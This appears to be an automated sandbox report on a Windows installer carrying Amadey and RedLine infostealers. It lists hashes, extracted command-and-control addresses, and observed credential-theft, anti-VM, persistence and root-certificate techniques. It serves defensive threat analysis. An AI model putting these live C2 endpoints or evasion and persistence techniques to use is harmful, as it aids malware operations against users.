amadey | 952e8649fe47039f20f778310b0591ee83efa659c8bf19c24587e37fe4b14606

Resubmissions

24/03/2025, 14:25

250324-rrkk1s1wb1 10

01/08/2024, 19:36

240801-ybf18avfrq 10

Analysis

max time kernel
70s
max time network
419s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
01/08/2024, 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1722448950.190938_setup.exe
Size

2.2MB
MD5

636b4c3770045d8e53c1485ea19f326b
SHA1

dbadc786af04a76114f9f1facb3c007e7b3e2c01
SHA256

952e8649fe47039f20f778310b0591ee83efa659c8bf19c24587e37fe4b14606
SHA512

b498a7b743a3f863998771851ada48e3533598bf156da3c1b9abf430500c4f2a2ede545f25330305c5571235929825edefeddd835f590318e152690b4f5e94a9
SSDEEP

49152:N23muAhf1prFS4Aiy3//QkyM3Pq6ZIiaJKu1AajJQe89:N23muAXs4AKnOCHiYAUQX9

Score

10^/10

amadey redline 0657d1 logsdiller cloud (tg: @logsdillabot)credential_access defense_evasion discovery evasion execution infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

51.89.205.200:16395

Extracted

Family

amadey

Version

4.41

Botnet

0657d1

http://185.215.113.19

Attributes

install_dir
0d8f5eb8a7
install_file
explorti.exe
strings_key
6c55a5f34bb433fbd933a168577b1838
url_paths
/Vi9leo/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Board.pif

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/4852-444-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2904 created 3424	2904	Board.pif	55

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	T_YTzxJlVooXrmiBJHBPZXHo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	eDKkS261ZGP96HkjeVJ8nzeD.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	1760	WMIC.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6260	powershell.exe
6212	powershell.exe
6720	powershell.exe
7144	powershell.exe
5388	powershell.exe
6100	powershell.EXE

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 7 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	eDKkS261ZGP96HkjeVJ8nzeD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	eDKkS261ZGP96HkjeVJ8nzeD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	T_YTzxJlVooXrmiBJHBPZXHo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	T_YTzxJlVooXrmiBJHBPZXHo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	137591c35b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	1722448950.190938_setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	Board.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	eDKkS261ZGP96HkjeVJ8nzeD.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	explorti.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk	T_YTzxJlVooXrmiBJHBPZXHo.exe

Executes dropped EXE 18 IoCs

pid	Process
2904	Board.pif
1988	Board.pif
1412	eDKkS261ZGP96HkjeVJ8nzeD.exe
1220	T_YTzxJlVooXrmiBJHBPZXHo.exe
3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe
3980	CQCAwvBV_Eku5MgaN1CIN8WN.exe
3164	jXYin0381nFHJ9ws6DquTxgv.exe
3200	HuZOPuDmYsuch1A9rMPI6ClM.exe
2040	wvXbn2WQZ6IWXm65CGJg6ITJ.exe
4408	VJYIyuiADO0D52ngpgOKwbKs.exe
4368	VJYIyuiADO0D52ngpgOKwbKs.tmp
32	Install.exe
3388	qualitymp3modifier32_64.exe
4732	qualitymp3modifier32_64.exe
4384	Install.exe
3472	explorti.exe
4300	137591c35b.exe
6256	d7807ff8ea.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Software\Wine	eDKkS261ZGP96HkjeVJ8nzeD.exe
Key opened	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Software\Wine	explorti.exe

Indirect Command Execution 1 TTPs 17 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
7164	forfiles.exe
7052	forfiles.exe
5712	forfiles.exe
6988	forfiles.exe
2924	forfiles.exe
5192	forfiles.exe
3572	forfiles.exe
5564	forfiles.exe
3276	forfiles.exe
6320	forfiles.exe
6728	forfiles.exe
4684	forfiles.exe
7084	forfiles.exe
1856	forfiles.exe
4452	forfiles.exe
4452	forfiles.exe
5192	forfiles.exe

Loads dropped DLL 1 IoCs

pid	Process
4368	VJYIyuiADO0D52ngpgOKwbKs.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1220-237-0x0000000000F60000-0x0000000001BDE000-memory.dmp	themida
behavioral1/memory/1220-244-0x0000000000F60000-0x0000000001BDE000-memory.dmp	themida
behavioral1/memory/1220-245-0x0000000000F60000-0x0000000001BDE000-memory.dmp	themida
behavioral1/memory/1220-255-0x0000000000F60000-0x0000000001BDE000-memory.dmp	themida
behavioral1/files/0x000700000002338b-220.dat	themida
behavioral1/memory/1220-777-0x0000000000F60000-0x0000000001BDE000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV6\\ExtreamFanV6.exe"	T_YTzxJlVooXrmiBJHBPZXHo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\137591c35b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\137591c35b.exe"	explorti.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d7807ff8ea.exe = "C:\\Users\\Admin\\1000029002\\d7807ff8ea.exe"	explorti.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	T_YTzxJlVooXrmiBJHBPZXHo.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
103	iplogger.org
104	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	api.myip.com
32	ipinfo.io
33	ipinfo.io
27	api.myip.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Board.pif
File opened for modification	C:\Windows\System32\GroupPolicy	Board.pif
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Board.pif
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Board.pif

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1340	tasklist.exe
2136	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1220	T_YTzxJlVooXrmiBJHBPZXHo.exe
1412	eDKkS261ZGP96HkjeVJ8nzeD.exe
3472	explorti.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2904 set thread context of 1988	2904	Board.pif	103
PID 3528 set thread context of 4944	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe	119
PID 3164 set thread context of 3560	3164	jXYin0381nFHJ9ws6DquTxgv.exe	122
PID 3980 set thread context of 4852	3980	CQCAwvBV_Eku5MgaN1CIN8WN.exe	124
PID 2040 set thread context of 2840	2040	wvXbn2WQZ6IWXm65CGJg6ITJ.exe	128

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ProgressiveKings	1722448950.190938_setup.exe
File created	C:\Windows\Tasks\explorti.job	eDKkS261ZGP96HkjeVJ8nzeD.exe
File created	C:\Windows\Tasks\bVxDcMagaMCWGEtnSM.job	schtasks.exe
File opened for modification	C:\Windows\EastTear	1722448950.190938_setup.exe
File opened for modification	C:\Windows\PicApplicant	1722448950.190938_setup.exe
File opened for modification	C:\Windows\MyanmarWarner	1722448950.190938_setup.exe
File opened for modification	C:\Windows\ExperimentalEducational	1722448950.190938_setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
6964	6256	WerFault.exe	173
5540	5168	WerFault.exe	198
6492	4384	WerFault.exe	127
5632	6480	WerFault.exe	295

System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	137591c35b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HuZOPuDmYsuch1A9rMPI6ClM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CQCAwvBV_Eku5MgaN1CIN8WN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorti.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eDKkS261ZGP96HkjeVJ8nzeD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jXYin0381nFHJ9ws6DquTxgv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1722448950.190938_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VJYIyuiADO0D52ngpgOKwbKs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VJYIyuiADO0D52ngpgOKwbKs.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	T_YTzxJlVooXrmiBJHBPZXHo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d7807ff8ea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qualitymp3modifier32_64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wvXbn2WQZ6IWXm65CGJg6ITJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qualitymp3modifier32_64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
7020	timeout.exe
6464	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6228	schtasks.exe
6384	schtasks.exe
6368	schtasks.exe
5200	schtasks.exe
2912	schtasks.exe
7052	schtasks.exe
4524	schtasks.exe
384	schtasks.exe
952	schtasks.exe
2200	schtasks.exe
5488	schtasks.exe
7156	schtasks.exe
5312	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
2904	Board.pif
1220	T_YTzxJlVooXrmiBJHBPZXHo.exe
1220	T_YTzxJlVooXrmiBJHBPZXHo.exe
1412	eDKkS261ZGP96HkjeVJ8nzeD.exe
1412	eDKkS261ZGP96HkjeVJ8nzeD.exe
4368	VJYIyuiADO0D52ngpgOKwbKs.tmp
4368	VJYIyuiADO0D52ngpgOKwbKs.tmp
4944	MSBuild.exe
4944	MSBuild.exe
3472	explorti.exe
3472	explorti.exe
1876	chrome.exe
1876	chrome.exe
5748	msedge.exe
5748	msedge.exe
4944	MSBuild.exe
4944	MSBuild.exe
3032	msedge.exe
3032	msedge.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe
4944	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1876	chrome.exe
1876	chrome.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1340	tasklist.exe
Token: SeDebugPrivilege	2136	tasklist.exe
Token: SeDebugPrivilege	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe
Token: SeDebugPrivilege	3164	jXYin0381nFHJ9ws6DquTxgv.exe
Token: SeDebugPrivilege	2840	RegAsm.exe
Token: SeBackupPrivilege	2840	RegAsm.exe
Token: SeSecurityPrivilege	2840	RegAsm.exe
Token: SeSecurityPrivilege	2840	RegAsm.exe
Token: SeSecurityPrivilege	2840	RegAsm.exe
Token: SeSecurityPrivilege	2840	RegAsm.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeDebugPrivilege	6720	powershell.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeShutdownPrivilege	1876	chrome.exe
Token: SeCreatePagefilePrivilege	1876	chrome.exe
Token: SeDebugPrivilege	7144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2904	Board.pif
2904	Board.pif
2904	Board.pif
4368	VJYIyuiADO0D52ngpgOKwbKs.tmp
1412	eDKkS261ZGP96HkjeVJ8nzeD.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
